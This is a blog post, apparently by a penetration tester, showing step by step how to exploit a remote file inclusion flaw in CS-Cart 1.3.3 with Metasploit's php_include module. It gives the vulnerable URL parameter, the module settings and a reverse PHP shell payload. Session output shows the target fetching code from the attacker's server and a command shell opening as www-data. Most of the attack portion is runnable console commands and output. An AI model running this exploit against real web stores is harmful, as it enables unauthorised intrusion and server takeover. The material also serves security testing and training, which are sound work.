Metasploit support for PHP Include exploitation, or simply known as RFI (Remote File Inclusion). I will show you how this work on CS-Cart 1.3.3 which vulnerable to remote file inclusion.

The vulnerable path is at classes/phpmailer/class.cs_phpmailer.php?classes_dir=[include arbitrary php code]

so in Metasploit, the PHPURI PATH will be like this:


let see how this exploitation works.<span id="more-125"></span>

msf &gt; search php_include
 [*] Searching loaded modules for pattern 'php_include'...


Name                     Rank       Description
 ----                     ----       -----------
 unix/webapp/php_include  excellent  PHP Remote File Include Generic Exploit

msf exploit(php_include) &gt; set payload php/reverse_php
 payload =&gt; php/reverse_php
 msf exploit(php_include) &gt; show options

Module options:

Name        Current Setting                                                Required  Description
 ----        ---------------                                                --------  -----------
 PATH        /commerce                                                      yes       The base directory to prepend to the URL to try
 PHPRFIDB    /opt/metasploit3/msf3/data/exploits/php/rfi-locations.dat      no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
 PHPURI      classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX  no        The URI to request, with the include parameter changed to XXpathXX
 Proxies                                                                    no        Use a proxy chain
 RHOST                                                 yes       The target address
 RPORT       80                                                             yes       The target port
 SRVHOST                                                        yes       The local host to listen on.
 SRVPORT     8080                                                           yes       The local port to listen on.
 SSL         false                                                          no        Negotiate SSL for incoming connections
 SSLVersion  SSL3                                                           no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
 URIPATH                                                                    no        The URI to use for this exploit (default is random)
 VHOST                                                                      no        HTTP server virtual host

Payload options (php/reverse_php):

Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 LHOST                   yes       The local address
 LPORT  4444             yes       The local port

Exploit target:

Id  Name
 --  ----
 0   Automatic

msf exploit(php_include) &gt;

Now we set all options.

msf exploit(php_include) > set PATH /commerce
 PATH => /commerce
 msf exploit(php_include) > set PHPURI /classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
 PHPURI => /classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
 msf exploit(php_include) > set RHOST

After all options meet requirement, let's launch the exploit.

msf exploit(php_include) > exploit

[*] Started reverse handler on
 [*] Using URL:
 [*]  Local IP:
 [*] PHP include server started.
 [*] Sending /commerce/classes/phpmailer/class.cs_phpmailer.php?classes_dir=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%2e%32%34%33%3a%38%30%38%30%2f%76%44%63%47%39%4c%3f
 [*] Command shell session 1 opened ( -> at 2010-05-21 11:36:45 +0700

 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next steps are yours 😉

About the Author modpr0be

Posisi saya saat ini sebagai direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation. Saya sering memberikan konsultasi tentang strategi keamanan kepada investor, mitra, dan pelanggan. Saya juga memberikan materi dalam bentuk pelatihan dan kontribusi komunitas dalam bentuk seminar, workshop, dan diskusi dengan berbagai topik seperti teknik peretasan, teknik eksploitasi, dan analisis intrusi. Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini saya memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE). Jika ingin menghubungi saya dapat melalui email di tom at spentera dot id.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:


You are commenting using your account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d blogger menyukai ini: